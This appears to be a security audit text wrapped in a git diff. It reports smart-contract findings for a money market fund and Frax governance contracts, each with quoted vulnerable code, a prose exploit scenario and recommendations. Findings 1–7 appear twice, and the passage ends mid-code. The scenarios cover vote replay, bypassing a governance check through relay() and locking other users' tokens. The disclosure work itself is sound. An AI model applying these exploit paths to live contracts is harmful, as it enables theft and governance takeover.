MAX_SUBMITTERS Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-FTMMF-12 Target: FT/infrastructure/multisig/MultiSigGenVerifier.sol Description The total number of submitters in the MultiSigGenVerifier contract can be more than the allowed limit of MAX_SUBMITTERS . The addSubmitters function in the MultiSigGenVerifier contract does not check that the total number of submitters in the submittersSet is less than the value of the MAX_SUBMITTERS constant. function addSubmitters ( address [] calldata submitters) public onlyVerifier { require (submitters.length <= MAX_SUBMITTERS, "INVALID_ARRAY_LENGTH" ); for ( uint256 i = 0 ; i < submitters.length; i++) { submittersSet.add(submitters[i]); } } Figure 12.1: The addSubmitters function in the MultiSigGenVerifier contract This allows the admin to add more than the maximum number of allowed submitters to the MultiSigGenVerifier contract. Recommendations Short term, add a check to the addSubmitters function to verify that the length of the submittersSet is less than or equal to the MAX_SUBMITTERS constant. Long term, document the system state machine specification and follow it to ensure proper data validation checks are added in all state-modifying functions. To ensure MAX_SUBMITTERS is never exceeded, add fuzz testing where MAX_SUBMITTERS is the system invariant under test. +13. Lack of contract existence check on target address Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-FTMMF-13 Target: FT/infrastructure/multisig/MultiSigGenVerifier.sol Description The signedDataExecution function lacks validation to ensure that the target argument is a contract address and not an externally owned account (EOA). The absence of such a check could lead to potential security issues, particularly when executing low-level calls to an address not containing contract code. Low-level calls to an EOA return true for the success variable instead of reverting as they would with a contract address. This unexpected behavior could trigger inadvertent execution of subsequent code relying on the success variable to be accurate, potentially resulting in undesired outcomes. The onlySubmitter modifier limits the potential impact of this vulnerability. function signedDataExecution( address target, bytes calldata payload, bytes calldata signatures ) external onlySubmitter { ... // Wallet logic if (acquiredThreshold >= _getRequiredThreshold(target)) { (bool success, bytes memory result) = target.call{value: 0}( payload ); emit TransactionExecuted(target, result); if (!success) { assembly { result := add(result, 0x04) } revert(abi.decode(result, (string))); } } else { revert("INSUFICIENT_THRESHOLD_ACQUIRED"); } } Figure 13.1: The signedDataExecution function in the MultiSigGenVerifier contract Exploit Scenario Alice, an authorized submitter account, calls the signedDataExecution function, passing in an EOA address instead of the expected contract address. The low-level call to the target address returns successfully and does not revert. As a result, Alice thinks she has executed code but in fact has not. Recommendations Short term, integrate a contract existence check to ensure that code is present at the address passed in as the target argument. Long term, use the Slither static analyzer to catch issues such as this one. Consider integrating slither-action into the project’s CI pipeline. +14. Pending transactions can trigger a DoS Severity: Informational Difficulty: Medium Type: Denial of Service Finding ID: TOB-FTMMF-14 Target: FT/infrastructure/modules/TransferAgentModule.sol, FT/MoneyMarketFund.sol Description An unbounded number of pending transactions can cause the _processSettlements function to run out of gas while trying to process them. There is no restriction on the length of pending transactions a user might have, and gas-intensive operations are performed in the for-loop of the _processSettlements function. If an account returns too many pending transactions, operations that call _processSettlements might revert with an out-of-gas error. function _processSettlements( address account, uint256 date, uint256 price ) internal whenTransactionsExist(account) { bytes32 [] memory pendingTxs = ITransactionStorage( moduleRegistry.getModuleAddress(TRANSACTIONAL_MODULE) ).getAccountTransactions(account); for ( uint256 i = 0; i < pendingTxs.length; ) { ... Figure 14.1: The pendingTxs loop in the _processSettlements function in the MoneyMarketFund contract The same issue affects the _processSettlements function in the TransferAgentModule contract. Exploit Scenario Eve submits multiple transactions to the requestSelfServiceCashPurchase function, and each creates a pending transaction record in the pendingTransactionsMap for Eve’s account. When settleTransactions is called with an array of accounts that includes Eve, the _processSettlements function tries to process all her pending transactions and runs out of gas in the attempt. Recommendations Short term, make the following changes to the transaction settlement flow: 1. Enhance the off-chain component of the system to identify accounts with too many pending transactions and exclude them from calls to _processSettlements flows. 2. Create another transaction settlement function that paginates over the list of pending transactions of a single account. Long term, implement thorough testing protocols for these loop structures, simulating various scenarios and edge cases that could potentially result in unbounded inputs. Ensure that all loop structures are robustly designed with safeguards in place, such as constraints and checks on input variables. +15. Dividend distribution has an incorrect rounding direction for negative rates Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-FTMMF-15 Target: FT/infrastructure/modules/TransferAgentModule.sol, FT/MoneyMarketFund.sol Description The rounding direction of the dividend calculation in the _processDividends function benefits the user when the dividend rate is negative, causing the fund to lose value it should retain. The division operation that computes dividend shares is rounding down in the _processDividends function of the MoneyMarketFund contract: function _processDividends ( address account , uint256 date , int256 rate , uint256 price ) internal whenHasHoldings(account) { uint256 dividendAmount = balanceOf(account) * uint256 (abs(rate)); uint256 dividendShares = dividendAmount / price; _payDividend(account, rate, dividendShares); // handle very unlikely scenario if occurs _handleNegativeYield(account, rate, dividendShares); _removeEmptyAccountFromHoldingsSet(account); emit DividendDistributed(account, date, rate, price, dividendShares); } Figure 15.1: The _processDividends function in the MoneyMarketFund contract As a result, for a negative dividend rate, the rounding benefits the user by subtracting a lower number of shares from the user balance. In particular, if the rate is low and the price is high, the dividend can round down to zero. The same issue affects the _processDividends function in the TransferAgentModule contract. Exploit Scenario Eve buys a small number of shares from multiple accounts. The dividend rounds down and is equal to zero. As a result, Eve avoids the losses from the downside movement of the fund while enjoying profits from the upside. Recommendations Short term, have the _processDividends function round up the number of dividendShares for negative dividend rates. Long term, document the expected rounding direction for every arithmetic operation (see appendix G ) and follow it to ensure that rounding is always beneficial to the fund. Use Echidna to find issues arising from the wrong rounding direction. diff --git a/findings_newupdate/tob/2023-05-fraxgov-securityreview.txt b/findings_newupdate/tob/2023-05-fraxgov-securityreview.txt new file mode 100644 index 0000000..b18b367 --- /dev/null +++ b/findings_newupdate/tob/2023-05-fraxgov-securityreview.txt @@ -0,0 +1,15 @@ +1. Race condition in FraxGovernorOmega target validation Severity: High Type: Timing Difficulty: High Finding ID: TOB-FRAXGOV-1 Target: src/FraxGovernorOmega.sol Description The FraxGovernorOmega contract is intended for carrying out day-to-day operations and less sensitive proposals that do not adjust system governance parameters. Proposals directly affecting system governance are managed in the FraxGovernorAlpha contract, which has a much higher quorum requirement (40%, compared with FraxGovernorOmega ’s 4% quorum requirement). When a new proposal is submitted to the FraxGovernorOmega contract through the propose or addTransaction function, the target address of the proposal is checked to prevent proposals from interacting with sensitive functions in allowlisted safes outside of the higher quorum flow (figure 1.1). However, if a proposal to allowlist a new safe is pending in FraxGovernorAlpha , and another proposal that interacts with the pending safe is preemptively submitted through FraxGovernorOmega.propose , the proposal would pass this check, as the new safe would not yet have been added to the allowlist. /// @notice The ```propose``` function is similar to OpenZeppelin's ```propose()``` with minor changes /// @dev Changes include: Forbidding targets that are allowlisted Gnosis Safes /// @return proposalId Proposal ID function propose ( address [] memory targets, uint256 [] memory values, bytes [] memory calldatas, string memory description ) public override returns ( uint256 proposalId ) { _requireSenderAboveProposalThreshold(); for ( uint256 i = 0 ; i < targets.length; ++i) { address target = targets[i]; // Disallow allowlisted safes because Omega would be able to call safe.approveHash() outside of the // addTransaction() / execute() / rejectTransaction() flow if ($safeRequiredSignatures[target] != 0 ) { revert IFraxGovernorOmega.DisallowedTarget(target); } } Figure 1.1: The target validation logic in the FraxGovernorOmega contract’s propose function This issue provides a short window of time in which a proposal to update governance parameters that is submitted through FraxGovernorOmega could pass with the contract’s 4% quorum, rather than needing to go through FraxGovernorAlpha and its 40% quorum, as intended. Such an exploit would also require cooperation from the safe owners to execute the approved transaction. As the vast majority of operations in the FraxGovernorOmega process will be optimistic proposals, the community may not monitor the contract as comprehensively as FraxGovernorAlpha , and a minority group of coordinated veFXS holders could take advantage of this loophole. Exploit Scenario A FraxGovernorAlpha proposal to add a new Gnosis Safe to the allowlist is being voted on. In anticipation of the proposal’s approval, the new safe owner prepares and signs a transaction on this new safe for a contentious or previously vetoed action. Alice, a veFXS holder, uses FraxGovernorOmega.propose to initiate a proposal to approve the hash of this transaction in the new safe. Alice coordinates with enough other interested veFXS holders to reach the required quorum on the proposal. The proposal passes, and the new safe owner is able to update governance parameters without the consensus of the community. Recommendations Short term, add additional validation to the end of the proposal lifecycle to detect whether the target has become an allowlisted safe. Long term, when designing new functionality, consider how this type of time-of-check to time-of-use mismatch could affect the system. +2. Vulnerable project dependency Severity: Undetermined Difficulty: High Type: Patching Finding ID: TOB-FRAXGOV-2 Target: package.json Description Although dependency scans did not uncover a direct threat to the project codebase, npm audit identified a dependency with a known vulnerability, the yaml library. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the project system as a whole. The output detailing the identified issue is provided below: Dependency Version ID Description yaml >=2.0.0-5, <2.2.2 CVE-2023-2251 Uncaught exception in GitHub repository eemeli/yaml Table 2.1: The issue identified by running npm audit Exploit Scenario Alice installs the dependencies for the Frax Finance governance protocol, including the vulnerable yaml library, on a clean machine. She subsequently uses the library, which fails to throw an error while formatting a yaml configuration file, impacting important data that the system needs to run as intended. Recommendations Short term, ensure that dependencies are up to date. Several node modules have been documented as malicious because they execute malicious code when installing dependencies to projects. Keep modules current and verify their integrity after installation. Long term, consider integrating automated dependency auditing into the development workflow. If dependencies cannot be updated when a vulnerability is disclosed, ensure that the project codebase does not use and is not affected by the vulnerable functionality of the dependency. +3. Replay protection missing in castVoteWithReasonAndParamsBySig Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-FRAXGOV-3 Target: Governor.sol Description The castVoteWithReasonAndParamsBySig function does not include a voter nonce, so transactions involving the function can be replayed by anyone. Votes can be cast through signatures by encoding the vote counts in the params argument. function castVoteWithReasonAndParamsBySig ( uint256 proposalId , uint8 support , string calldata reason, bytes memory params, uint8 v , bytes32 r , bytes32 s ) public virtual override returns ( uint256 ) { address voter = ECDSA.recover( _hashTypedDataV4( keccak256 ( abi.encode( EXTENDED_BALLOT_TYPEHASH, proposalId, support, keccak256 ( bytes (reason)), keccak256 (params) ) ) ), v, r, s ); return _castVote(proposalId, voter, support, reason, params); } Figure 3.1: The castVoteWithReasonAndParamsBySig function does not include a nonce. ( Governor.sol#L508-L535 ) The castVoteWithReasonAndParamsBySig function calls the _countVoteFractional function in the GovernorCountingFractional contract, which keeps track of partial votes. Unlike _countVoteNominal , _countVoteFractional can be called multiple times, as long as the voter’s total voting weight is not exceeded. Exploit Scenario Alice has 100,000 voting power. She signs a message, and a relayer calls castVoteWithReasonAndParamsBySig to vote for one “yes” and one “abstain”. Eve sees this transaction on-chain and replays it for the remainder of Alice’s voting power, casting votes that Alice did not intend to. Recommendations Short term, either include a voter nonce for replay protection or modify the _countVoteFractional function to require that _proposalVotersWeightCast[proposalId][account] equals 0 , which would allow votes to be cast only once. Long term, increase the test coverage to include cases of signature replay. +4. Ability to lock any user’s tokens using deposit_for Severity: Informational Difficulty: Low Type: Data Validation Finding ID: TOB-FRAXGOV-4 Target: veFXS.vy Description The deposit_for function can be used to lock anyone's tokens given sufficient token approvals and an existing lock. @external @nonreentrant ( 'lock' ) def deposit_for (_addr: address, _value: uint256): """ @notice Deposit `_value` tokens for `_addr` and add to the lock @dev Anyone (even a smart contract) can deposit for someone else, but cannot extend their locktime and deposit for a brand new user @param _addr User's wallet address @param _value Amount to add to user's lock """ _locked: LockedBalance = self .locked[_addr] assert _value > 0 # dev: need non-zero value assert _locked.amount > 0 , "No existing lock found" assert _locked.end > block.timestamp, "Cannot add to expired lock. Withdraw" self ._deposit_for(_addr, _value, 0 , self .locked[_addr], DEPOSIT_FOR_TYPE) Figure 4.1: The deposit_for function can be used to lock anyone’s tokens. ( test/veFXS.vy#L458-L474 ) The same issue is present in the veCRV contract for the CRV token, so it may be known or intentional. Exploit Scenario Alice gives unlimited FXS token approval to the veFXS contract. Alice wants to lock 1 FXS for 4 years. Bob sees that Alice has 100,000 FXS and locks all of the tokens for her. Alice is no longer able to access her 100,000 FXS. Recommendations Short term, make users aware of the issue in the existing token contract. Only present the user with exact approval limits when locking FXS. +5. The relay function can be used to call critical safe functions Severity: High Difficulty: Medium Type: Access Controls Finding ID: TOB-FRAXGOV-5 Target: src/Governor.sol Description The relay function of the FraxGovernorOmega contract supports arbitrary calls to arbitrary targets and can be leveraged in a proposal to call sensitive functions on the Gnosis Safe. function relay ( address target , uint256 value , bytes calldata data) external payable virtual onlyGovernance { ( bool success , bytes memory returndata) = target.call{value: value}(data); Address.verifyCallResult(success, returndata, "Governor: relay reverted without message" ); } Figure 5.1: The relay function inherited from Governor.sol The FraxGovernorOmega contract checks proposed transactions to ensure they do not target critical functions on the Gnosis Safe contract outside of the more restrictive FraxGovernorAlpha flow. function propose ( address [] memory targets, uint256 [] memory values, bytes [] memory calldatas, string memory description ) public override returns ( uint256 proposalId ) { _requireSenderAboveProposalThreshold(); for ( uint256 i = 0 ; i < targets.length; ++i) { address target = targets[i]; // Disallow allowlisted safes because Omega would be able to call safe.approveHash() outside of the // addTransaction() / execute() / rejectTransaction() flow if ($safeRequiredSignatures[target] != 0 ) { revert IFraxGovernorOmega.DisallowedTarget(target); } } proposalId = _propose({ targets: targets, values: values, calldatas: calldatas, description: description }); } Figure 5.2: The propose function of FraxGovernorOmega.sol A malicious user can hide a call to the Gnosis Safe by wrapping it in a call to the relay function. There are no further restrictions on the target contract argument, which means the relay function can be called with calldata that targets the Gnosis Safe contract. Exploit Scenario Alice, a veFXS holder, submits a transaction to the propose function. The targets array contains the FraxGovernorOmega address, and the corresponding calldatas array contains an encoded call to its relay function. The encoded call to the relay function has a target address of an allowlisted Gnosis Safe and an encoded call to its approveHash function with a payload of a malicious transaction hash. Due to the low quorum threshold on FraxGovernorOmega and the shorter voting period, Alice is able to push her malicious transaction through, and it is approved by the safe even though it should not have been. Recommendations Short term, add a check to the relay function that prevents it from targeting addresses of allowlisted safes. Long term, carefully examine all cases of user-provided inputs, especially where arbitrary targets and calldata can be submitted, and expand the unit tests to account for edge cases specific to the wider system. +6. Votes can be delegated to contracts Severity: Informational Difficulty: Low Type: Undefined Behavior Finding ID: TOB-FRAXGOV-6 Target: VeFxsVotingDelegation.sol Description Votes can be delegated to smart contracts. This behavior contrasts with the fact that FXS tokens can be locked only in whitelisted contracts. Allowing votes to be delegated to smart contracts could lead to unexpected behavior. By default, smart contracts are unable to gain voting power; to gain voting power, they need to be explicitly whitelisted by the Frax Finance team in the veFXS contract. @internal def assert_not_contract (addr: address): """ @notice Check if the call is from a whitelisted smart contract, revert if not @param addr Address to be checked """ if addr != tx.origin: checker: address = self .smart_wallet_checker if checker != ZERO_ADDRESS: if SmartWalletChecker(checker).check(addr): return raise "Smart contract depositors not allowed" Figure 6.1: The contract check in veFXS.vy This is the intended design of the voting escrow contract, as allowing smart contracts to vote would enable wrapped tokens and bribes. The VeFxsVotingDelegation contract enables users to delegate their voting power to other addresses, but it does not contain a check for smart contracts. This means that smart contracts can now hold voting power, and the team is unable to disallow this. function _delegate ( address delegator , address delegatee ) internal { // Revert if delegating to self with address(0), should be address(delegator) if (delegatee == address ( 0 )) revert IVeFxsVotingDelegation.IncorrectSelfDelegation(); IVeFxsVotingDelegation.Delegation memory previousDelegation = $delegations[delegator]; // This ensures that checkpoints take effect at the next epoch uint256 checkpointTimestamp = (( block.timestamp / 1 days) * 1 days) + 1 days; IVeFxsVotingDelegation.NormalizedVeFxsLockInfo memory normalizedDelegatorVeFxsLockInfo = _getNormalizedVeFxsLockInfo({ delegator: delegator, checkpointTimestamp: checkpointTimestamp }); _moveVotingPowerFromPreviousDelegate({ previousDelegation: previousDelegation, checkpointTimestamp: checkpointTimestamp }); _moveVotingPowerToNewDelegate({ newDelegate: delegatee, delegatorVeFxsLockInfo: normalizedDelegatorVeFxsLockInfo, checkpointTimestamp: checkpointTimestamp }); // ... } Figure 6.2: The _delegate function in VeFxsVotingDelegation.sol Exploit Scenario Eve sets up a contract that accepts delegated votes in exchange for rewards. The contract ends up owning a majority of the FXS voting power. Recommendations Short term, consider whether smart contracts should be allowed to hold voting power. If so, document this fact; if not, add a check to the VeFxsVotingDelegation contract to ensure that addresses receiving delegated voting power are not smart contracts . Long term, when implementing new features, consider the implications of adding them to ensure that they do not lift constraints that were placed beforehand. +7. Lack of public documentation regarding voting power expiry Severity: Informational Difficulty: Low Type: Patching Finding ID: TOB-FRAXGOV-7 Target: VeFxsVotingDelegation.sol Description The user documentation concerning the calculation of voting power is unclear. The Frax-Governance specification sheet provided by the Frax Finance team states, “Voting power goes to 0 at veFXS lock expiration time, this is different from veFXS.getBalance() which will return the locked amount of FXS after the lock has expired.” This statement is in line with the code’s behavior. The _calculateVotingWeight function in the VeFxsVotingDelegation contract does not return the locked veFXS balance once a lock has expired. /// @notice The ```_calculateVotingWeight``` function calculates ```account```'s voting weight. Is 0 if they ever delegated and the delegation is in effect. /// @param voter Address of voter /// @param timestamp A block.timestamp, typically corresponding to a proposal snapshot /// @return votingWeight Voting weight corresponding to ```account```'s veFXS balance function _calculateVotingWeight ( address voter , uint256 timestamp ) internal view returns ( uint256 ) { // If lock is expired they have no voting weight if (VE_FXS.locked(voter).end <= timestamp) return 0 ; uint256 firstDelegationTimestamp = $delegations[voter].firstDelegationTimestamp; // Never delegated OR this timestamp is before the first delegation by account if (firstDelegationTimestamp == 0 || timestamp < firstDelegationTimestamp) { try VE_FXS.balanceOf({ addr: voter, _t: timestamp }) returns ( uint256 _balance ) { return _balance; } catch {} } return 0 ; } Figure 7.2: The function that calculates the voting weight in VeFxsVotingDelegation.sol If a voter’s lock has expired or was never created, the short-circuit condition returns zero voting power. This behavior contrasts with the veFxs.balanceOf function, which would return the user’s last locked FXS balance. @external @view def balanceOf (addr: address, _t: uint256 = block.timestamp) -> uint256: """ @notice Get the current voting power for `msg.sender` @dev Adheres to the ERC20 `balanceOf` interface for Aragon compatibility @param addr User wallet address @param _t Epoch time to return voting power at @return User voting power """ _epoch: uint256 = self .user_point_epoch[addr] if _epoch == 0 : return 0 else : last_point: Point = self .user_point_history[addr][_epoch] last_point.bias -= last_point.slope * convert(_t - last_point.ts, int128) if last_point.bias < 0 : last_point.bias = 0 unweighted_supply: uint256 = convert(last_point.bias, uint256) # Original from veCRV weighted_supply: uint256 = last_point.fxs_amt + (VOTE_WEIGHT_MULTIPLIER * unweighted_supply) return weighted_supply Figure 7.1: The balanceOf function in veFXS.vy This divergence should be clearly documented in the code and should be reflected in Frax Finance’s public-facing documentation, which does not mention the fact that an expired lock does not hold any voting power: “Each veFXS has 1 vote in governance proposals. Staking 1 FXS for the maximum time, 4 years, would generate 4 veFXS. This veFXS balance itself will slowly decay down to 1 veFXS after 4 years, [...]”. Exploit Scenario Alice buys FXS to be able to vote on a proposal. She is not aware that she is required to create a lock (even if expired) to have any voting power at all. She is unable to vote for the proposal. Recommendations Short term, modify the VeFxsVotingDelegation contract to reflect the desired voting power curve and/or document whether this is intended behavior. Long term, make sure to keep public-facing documentation up to date when changes are made. +1. Race condition in FraxGovernorOmega target validation Severity: High Type: Timing Difficulty: High Finding ID: TOB-FRAXGOV-1 Target: src/FraxGovernorOmega.sol Description The FraxGovernorOmega contract is intended for carrying out day-to-day operations and less sensitive proposals that do not adjust system governance parameters. Proposals directly affecting system governance are managed in the FraxGovernorAlpha contract, which has a much higher quorum requirement (40%, compared with FraxGovernorOmega ’s 4% quorum requirement). When a new proposal is submitted to the FraxGovernorOmega contract through the propose or addTransaction function, the target address of the proposal is checked to prevent proposals from interacting with sensitive functions in allowlisted safes outside of the higher quorum flow (figure 1.1). However, if a proposal to allowlist a new safe is pending in FraxGovernorAlpha , and another proposal that interacts with the pending safe is preemptively submitted through FraxGovernorOmega.propose , the proposal would pass this check, as the new safe would not yet have been added to the allowlist. /// @notice The ```propose``` function is similar to OpenZeppelin's ```propose()``` with minor changes /// @dev Changes include: Forbidding targets that are allowlisted Gnosis Safes /// @return proposalId Proposal ID function propose ( address [] memory targets, uint256 [] memory values, bytes [] memory calldatas, string memory description ) public override returns ( uint256 proposalId ) { _requireSenderAboveProposalThreshold(); for ( uint256 i = 0 ; i < targets.length; ++i) { address target = targets[i]; // Disallow allowlisted safes because Omega would be able to call safe.approveHash() outside of the // addTransaction() / execute() / rejectTransaction() flow if ($safeRequiredSignatures[target] != 0 ) { revert IFraxGovernorOmega.DisallowedTarget(target); } } Figure 1.1: The target validation logic in the FraxGovernorOmega contract’s propose function This issue provides a short window of time in which a proposal to update governance parameters that is submitted through FraxGovernorOmega could pass with the contract’s 4% quorum, rather than needing to go through FraxGovernorAlpha and its 40% quorum, as intended. Such an exploit would also require cooperation from the safe owners to execute the approved transaction. As the vast majority of operations in the FraxGovernorOmega process will be optimistic proposals, the community may not monitor the contract as comprehensively as FraxGovernorAlpha , and a minority group of coordinated veFXS holders could take advantage of this loophole. Exploit Scenario A FraxGovernorAlpha proposal to add a new Gnosis Safe to the allowlist is being voted on. In anticipation of the proposal’s approval, the new safe owner prepares and signs a transaction on this new safe for a contentious or previously vetoed action. Alice, a veFXS holder, uses FraxGovernorOmega.propose to initiate a proposal to approve the hash of this transaction in the new safe. Alice coordinates with enough other interested veFXS holders to reach the required quorum on the proposal. The proposal passes, and the new safe owner is able to update governance parameters without the consensus of the community. Recommendations Short term, add additional validation to the end of the proposal lifecycle to detect whether the target has become an allowlisted safe. Long term, when designing new functionality, consider how this type of time-of-check to time-of-use mismatch could affect the system. +2. Vulnerable project dependency Severity: Undetermined Difficulty: High Type: Patching Finding ID: TOB-FRAXGOV-2 Target: package.json Description Although dependency scans did not uncover a direct threat to the project codebase, npm audit identified a dependency with a known vulnerability, the yaml library. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the project system as a whole. The output detailing the identified issue is provided below: Dependency Version ID Description yaml >=2.0.0-5, <2.2.2 CVE-2023-2251 Uncaught exception in GitHub repository eemeli/yaml Table 2.1: The issue identified by running npm audit Exploit Scenario Alice installs the dependencies for the Frax Finance governance protocol, including the vulnerable yaml library, on a clean machine. She subsequently uses the library, which fails to throw an error while formatting a yaml configuration file, impacting important data that the system needs to run as intended. Recommendations Short term, ensure that dependencies are up to date. Several node modules have been documented as malicious because they execute malicious code when installing dependencies to projects. Keep modules current and verify their integrity after installation. Long term, consider integrating automated dependency auditing into the development workflow. If dependencies cannot be updated when a vulnerability is disclosed, ensure that the project codebase does not use and is not affected by the vulnerable functionality of the dependency. +3. Replay protection missing in castVoteWithReasonAndParamsBySig Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-FRAXGOV-3 Target: Governor.sol Description The castVoteWithReasonAndParamsBySig function does not include a voter nonce, so transactions involving the function can be replayed by anyone. Votes can be cast through signatures by encoding the vote counts in the params argument. function castVoteWithReasonAndParamsBySig ( uint256 proposalId , uint8 support , string calldata reason, bytes memory params, uint8 v , bytes32 r , bytes32 s ) public virtual override returns ( uint256 ) { address voter = ECDSA.recover( _hashTypedDataV4( keccak256 ( abi.encode( EXTENDED_BALLOT_TYPEHASH, proposalId, support, keccak256 ( bytes (reason)), keccak256 (params) ) ) ), v, r, s ); return _castVote(proposalId, voter, support, reason, params); } Figure 3.1: The castVoteWithReasonAndParamsBySig function does not include a nonce. ( Governor.sol#L508-L535 ) The castVoteWithReasonAndParamsBySig function calls the _countVoteFractional function in the GovernorCountingFractional contract, which keeps track of partial votes. Unlike _countVoteNominal , _countVoteFractional can be called multiple times, as long as the voter’s total voting weight is not exceeded. Exploit Scenario Alice has 100,000 voting power. She signs a message, and a relayer calls castVoteWithReasonAndParamsBySig to vote for one “yes” and one “abstain”. Eve sees this transaction on-chain and replays it for the remainder of Alice’s voting power, casting votes that Alice did not intend to. Recommendations Short term, either include a voter nonce for replay protection or modify the _countVoteFractional function to require that _proposalVotersWeightCast[proposalId][account] equals 0 , which would allow votes to be cast only once. Long term, increase the test coverage to include cases of signature replay. +4. Ability to lock any user’s tokens using deposit_for Severity: Informational Difficulty: Low Type: Data Validation Finding ID: TOB-FRAXGOV-4 Target: veFXS.vy Description The deposit_for function can be used to lock anyone's tokens given sufficient token approvals and an existing lock. @external @nonreentrant ( 'lock' ) def deposit_for (_addr: address, _value: uint256): """ @notice Deposit `_value` tokens for `_addr` and add to the lock @dev Anyone (even a smart contract) can deposit for someone else, but cannot extend their locktime and deposit for a brand new user @param _addr User's wallet address @param _value Amount to add to user's lock """ _locked: LockedBalance = self .locked[_addr] assert _value > 0 # dev: need non-zero value assert _locked.amount > 0 , "No existing lock found" assert _locked.end > block.timestamp, "Cannot add to expired lock. Withdraw" self ._deposit_for(_addr, _value, 0 , self .locked[_addr], DEPOSIT_FOR_TYPE) Figure 4.1: The deposit_for function can be used to lock anyone’s tokens. ( test/veFXS.vy#L458-L474 ) The same issue is present in the veCRV contract for the CRV token, so it may be known or intentional. Exploit Scenario Alice gives unlimited FXS token approval to the veFXS contract. Alice wants to lock 1 FXS for 4 years. Bob sees that Alice has 100,000 FXS and locks all of the tokens for her. Alice is no longer able to access her 100,000 FXS. Recommendations Short term, make users aware of the issue in the existing token contract. Only present the user with exact approval limits when locking FXS. +5. The relay function can be used to call critical safe functions Severity: High Difficulty: Medium Type: Access Controls Finding ID: TOB-FRAXGOV-5 Target: src/Governor.sol Description The relay function of the FraxGovernorOmega contract supports arbitrary calls to arbitrary targets and can be leveraged in a proposal to call sensitive functions on the Gnosis Safe. function relay ( address target , uint256 value , bytes calldata data) external payable virtual onlyGovernance { ( bool success , bytes memory returndata) = target.call{value: value}(data); Address.verifyCallResult(success, returndata, "Governor: relay reverted without message" ); } Figure 5.1: The relay function inherited from Governor.sol The FraxGovernorOmega contract checks proposed transactions to ensure they do not target critical functions on the Gnosis Safe contract outside of the more restrictive FraxGovernorAlpha flow. function propose ( address [] memory targets, uint256 [] memory values, bytes [] memory calldatas, string memory description ) public override returns ( uint256 proposalId ) { _requireSenderAboveProposalThreshold(); for ( uint256 i = 0 ; i < targets.length; ++i) { address target = targets[i]; // Disallow allowlisted safes because Omega would be able to call safe.approveHash() outside of the // addTransaction() / execute() / rejectTransaction() flow if ($safeRequiredSignatures[target] != 0 ) { revert IFraxGovernorOmega.DisallowedTarget(target); } } proposalId = _propose({ targets: targets, values: values, calldatas: calldatas, description: description }); } Figure 5.2: The propose function of FraxGovernorOmega.sol A malicious user can hide a call to the Gnosis Safe by wrapping it in a call to the relay function. There are no further restrictions on the target contract argument, which means the relay function can be called with calldata that targets the Gnosis Safe contract. Exploit Scenario Alice, a veFXS holder, submits a transaction to the propose function. The targets array contains the FraxGovernorOmega address, and the corresponding calldatas array contains an encoded call to its relay function. The encoded call to the relay function has a target address of an allowlisted Gnosis Safe and an encoded call to its approveHash function with a payload of a malicious transaction hash. Due to the low quorum threshold on FraxGovernorOmega and the shorter voting period, Alice is able to push her malicious transaction through, and it is approved by the safe even though it should not have been. Recommendations Short term, add a check to the relay function that prevents it from targeting addresses of allowlisted safes. Long term, carefully examine all cases of user-provided inputs, especially where arbitrary targets and calldata can be submitted, and expand the unit tests to account for edge cases specific to the wider system. +6. Votes can be delegated to contracts Severity: Informational Difficulty: Low Type: Undefined Behavior Finding ID: TOB-FRAXGOV-6 Target: VeFxsVotingDelegation.sol Description Votes can be delegated to smart contracts. This behavior contrasts with the fact that FXS tokens can be locked only in whitelisted contracts. Allowing votes to be delegated to smart contracts could lead to unexpected behavior. By default, smart contracts are unable to gain voting power; to gain voting power, they need to be explicitly whitelisted by the Frax Finance team in the veFXS contract. @internal def assert_not_contract (addr: address): """ @notice Check if the call is from a whitelisted smart contract, revert if not @param addr Address to be checked """ if addr != tx.origin: checker: address = self .smart_wallet_checker if checker != ZERO_ADDRESS: if SmartWalletChecker(checker).check(addr): return raise "Smart contract depositors not allowed" Figure 6.1: The contract check in veFXS.vy This is the intended design of the voting escrow contract, as allowing smart contracts to vote would enable wrapped tokens and bribes. The VeFxsVotingDelegation contract enables users to delegate their voting power to other addresses, but it does not contain a check for smart contracts. This means that smart contracts can now hold voting power, and the team is unable to disallow this. function _delegate ( address delegator , address delegatee ) internal { // Revert if delegating to self with address(0), should be address(delegator) if (delegatee == address ( 0 )) revert IVeFxsVotingDelegation.IncorrectSelfDelegation(); IVeFxsVotingDelegation.Delegation memory previousDelegation = $delegations[delegator]; // This ensures that checkpoints take effect at the next epoch uint256 checkpointTimestamp = (( block.timestamp / 1 days) * 1 days) + 1 days; IVeFxsVotingDelegation.NormalizedVeFxsLockInfo memory normalizedDelegatorVeFxsLockInfo = _getNormalizedVeFxsLockInfo({ delegator: delegator, checkpointTimestamp: checkpointTimestamp }); _moveVotingPowerFromPreviousDelegate({ previousDelegation: previousDelegation, checkpointTimestamp: checkpointTimestamp }); _moveVotingPowerToNewDelegate({ newDelegate: delegatee, delegatorVeFxsLockInfo: normalizedDelegatorVeFxsLockInfo, checkpointTimestamp: checkpointTimestamp }); // ... } Figure 6.2: The _delegate function in VeFxsVotingDelegation.sol Exploit Scenario Eve sets up a contract that accepts delegated votes in exchange for rewards. The contract ends up owning a majority of the FXS voting power. Recommendations Short term, consider whether smart contracts should be allowed to hold voting power. If so, document this fact; if not, add a check to the VeFxsVotingDelegation contract to ensure that addresses receiving delegated voting power are not smart contracts . Long term, when implementing new features, consider the implications of adding them to ensure that they do not lift constraints that were placed beforehand. +7. Lack of public documentation regarding voting power expiry Severity: Informational Difficulty: Low Type: Patching Finding ID: TOB-FRAXGOV-7 Target: VeFxsVotingDelegation.sol Description The user documentation concerning the calculation of voting power is unclear. The Frax-Governance specification sheet provided by the Frax Finance team states, “Voting power goes to 0 at veFXS lock expiration time, this is different from veFXS.getBalance() which will return the locked amount of FXS after the lock has expired.” This statement is in line with the code’s behavior. The _calculateVotingWeight function in the VeFxsVotingDelegation contract does not return the locked veFXS balance once a lock has expired. /// @notice The ```_calculateVotingWeight``` function calculates ```account```'s voting weight. Is 0 if they ever delegated and the delegation is in effect. /// @param voter Address of voter /// @param timestamp A block.timestamp, typically corresponding to a proposal snapshot /// @return votingWeight Voting weight corresponding to ```account```'s veFXS balance function _calculateVotingWeight ( address voter , uint256 timestamp 